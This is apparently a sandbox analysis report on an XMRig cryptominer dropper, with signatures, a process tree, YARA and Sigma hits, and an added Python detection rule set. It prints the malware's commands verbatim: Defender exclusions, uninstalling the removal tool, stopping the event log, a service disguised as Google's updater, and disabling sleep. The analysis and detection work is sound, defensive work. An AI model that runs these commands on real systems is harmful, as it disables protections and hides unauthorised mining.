
Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Analysis ID: 1473042
MD5: 1547e40089b1b06c2e27658c4f478466
SHA1: b531e9eaeb0f3e606635623d0775b94e2da113a9
SHA256: 62133bf304c2143af08217ea5caa1102009e3f70682896ae2997b232f212ec51
Tags: exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Drops executables to the windows directory (C:\Windows) and starts them
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe (PID: 612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe" MD5: 1547E40089B1B06C2E27658C4F478466)
    • system64x.exe (PID: 6188 cmdline: "C:\Windows\SysWOW64\system64x.exe" MD5: 4471F946569BFA17D68108068D7A17A1)
      • powershell.exe (PID: 5468 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • powercfg.exe (PID: 6532 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3172 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2884 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2468 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 3876 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • sc.exe (PID: 2292 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7240 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7288 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7296 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 7368 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 4471F946569BFA17D68108068D7A17A1)
    • powershell.exe (PID: 7380 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7772 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 7552 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7568 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7584 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7612 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7672 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 7920 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 7728 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7780 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
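The process tree above is the raw material a process-creation detection runs over: the 32-bit dropper starts system64x.exe, which in turn runs the Add-MpPreference exclusion, four powercfg timeout changes, the MSRT removal (wusa /uninstall /kb:890830), a service named GoogleUpdateTaskMachineQC whose binary sits in C:\ProgramData, an eventlog stop, and dialer.exe, under which the injected system processes appear. The following is an added example written for this page, not Joe Sandbox, Sigma or the sample's own code: a small rule set over constructed Sysmon-style process events. PIDs and command lines in the sample are copied from the tree; the services.exe entry (PID 700) and the svchost it starts (PID 9001) are assumed, as a benign control, and the svchost parent allow-list is shorter than the public Sigma rule's.

```python
"""Added example for this page (not Joe Sandbox, Sigma or sample code): rules over process-creation events."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process (Sysmon "Image")
    cmdline: str    # Sysmon "CommandLine"


def exe_name(image: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return image.rsplit("\\", 1)[-1].lower()

def extract_binpath(cmdline: str) -> Optional[str]:
    """binPath= value of an 'sc create' command line (quoted or bare), or None."""
    m = (re.search(r'binpath=\s*"([^"]+)"', cmdline, re.I)
         or re.search(r"binpath=\s*(\S+)", cmdline, re.I))
    return m.group(1) if m else None

USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\")   # a service binary here is suspect
SVCHOST_PARENTS_OK = {"services.exe", "svchost.exe", "msmpeng.exe", "mrt.exe"}  # trimmed Sigma list

def rule_defender_exclusion(ev: ProcEvent, parents: Dict[int, ProcEvent]) -> Optional[str]:
    cl = ev.cmdline.lower()
    if exe_name(ev.image) == "powershell.exe" and "add-mppreference" in cl and "-exclusion" in cl:
        return "defender_exclusion_added"
    return None

def rule_power_settings(ev: ProcEvent, parents: Dict[int, ProcEvent]) -> Optional[str]:
    # powercfg /x -{standby,hibernate}-timeout-{ac,dc} 0: never sleep, so the miner keeps running
    if exe_name(ev.image) == "powercfg.exe" and re.search(
            r"-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", ev.cmdline, re.I):
        return "sleep_hibernate_disabled"
    return None

def rule_service_binpath(ev: ProcEvent, parents: Dict[int, ProcEvent]) -> Optional[str]:
    if exe_name(ev.image) == "sc.exe" and re.search(r"\bcreate\b", ev.cmdline, re.I):
        path = extract_binpath(ev.cmdline)
        if path and path.lower().startswith(USER_WRITABLE_PREFIXES):
            return "service_binpath_user_writable"
    return None

def rule_eventlog_stop(ev: ProcEvent, parents: Dict[int, ProcEvent]) -> Optional[str]:
    if exe_name(ev.image) == "sc.exe" and re.search(r"\bstop\s+eventlog\b", ev.cmdline, re.I):
        return "eventlog_service_stopped"
    return None

def rule_msrt_removal(ev: ProcEvent, parents: Dict[int, ProcEvent]) -> Optional[str]:
    # KB890830 is the Malicious Software Removal Tool; 'wusa /uninstall' removes it
    cl = ev.cmdline.lower()
    if exe_name(ev.image) in ("cmd.exe", "wusa.exe") and "/uninstall" in cl and "/kb:890830" in cl:
        return "msrt_uninstalled"
    return None

def rule_svchost_parent(ev: ProcEvent, parents: Dict[int, ProcEvent]) -> Optional[str]:
    # svchost.exe is normally started by services.exe; dialer.exe as parent is the injection artefact
    if exe_name(ev.image) != "svchost.exe":
        return None
    parent = parents.get(ev.ppid)
    if parent is None or exe_name(parent.image) in SVCHOST_PARENTS_OK:
        return None     # parent outside the scanned window, or an expected one
    return "uncommon_svchost_parent"

RULES = [rule_defender_exclusion, rule_power_settings, rule_service_binpath,
         rule_eventlog_stop, rule_msrt_removal, rule_svchost_parent]

def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Run every rule over every event; return sorted (pid, tag) hits."""
    parents = {e.pid: e for e in events}
    hits = []
    for ev in events:
        for rule in RULES:
            tag = rule(ev, parents)
            if tag:
                hits.append((ev.pid, tag))
    return sorted(hits)

# Constructed sample: PIDs and command lines copied from the process tree above;
# services.exe (PID 700) and the svchost it starts (PID 9001) are assumed, as a benign control.
SAMPLE_EVENTS = [
    ProcEvent(700, 520, r"C:\Windows\System32\services.exe", r"C:\Windows\system32\services.exe"),
    ProcEvent(6188, 612, r"C:\Windows\SysWOW64\system64x.exe", r'"C:\Windows\SysWOW64\system64x.exe"'),
    ProcEvent(5468, 6188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath "
              r"@($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    ProcEvent(6464, 6188, r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(7200, 6464, r"C:\Windows\System32\wusa.exe", "wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(6532, 6188, r"C:\Windows\System32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    ProcEvent(3876, 6188, r"C:\Windows\System32\dialer.exe", r"C:\Windows\system32\dialer.exe"),
    ProcEvent(924, 3876, r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM"),
    ProcEvent(7240, 6188, r"C:\Windows\System32\sc.exe",
              r'C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"'),
    ProcEvent(7288, 6188, r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    ProcEvent(9001, 700, r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"),
]
```

`scan(SAMPLE_EVENTS)` returns seven hits, one per hostile command plus the svchost under dialer.exe, and nothing for the control svchost under services.exe. Each rule keys on the image name plus a command-line pattern rather than on the process name alone, because sc.exe, powercfg.exe and powershell.exe are all used legitimately; the binPath check is the one that needs a parsed value, since the string "GoogleUpdateTaskMachineQC" is deliberately chosen to look like Google's own updater service.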
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author | Strings
0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000002F.00000002.3608696506.00000255463E2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000002F.00000003.2470568560.0000025545E4D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000002F.00000002.3605197071.0000025545E50000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
(5 of 7 entries shown)

Source | Rule | Description | Author | Strings
47.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
47.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
47.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

Source | Rule | Description | Author | Strings
amsi64_612.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_612.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

                      Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6532, ProcessName: powercfg.exe

                      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5468, ProcessName: powershell.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5hfiz3n.jvw.ps1
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5468, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 3876, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 7240, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5468, ProcessName: powershell.exe

                      HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7288, ProcessName: sc.exe
                      No Snort rule has matched


                      AV Detection

Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe; Avira: detected
Source: C:\Windows\SysWOW64\system64x.exe; Avira: detection malicious, Label: TR/Kryptik.byulc
Source: C:\ProgramData\Google\Chrome\updater.exe; Avira: detection malicious, Label: TR/Kryptik.byulc
Source: C:\ProgramData\Google\Chrome\updater.exe; ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\system64x.exe; ReversingLabs: Detection: 91%
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe; ReversingLabs: Detection: 47%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe; Joe Sandbox ML: detected

                      Bitcoin Miner

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
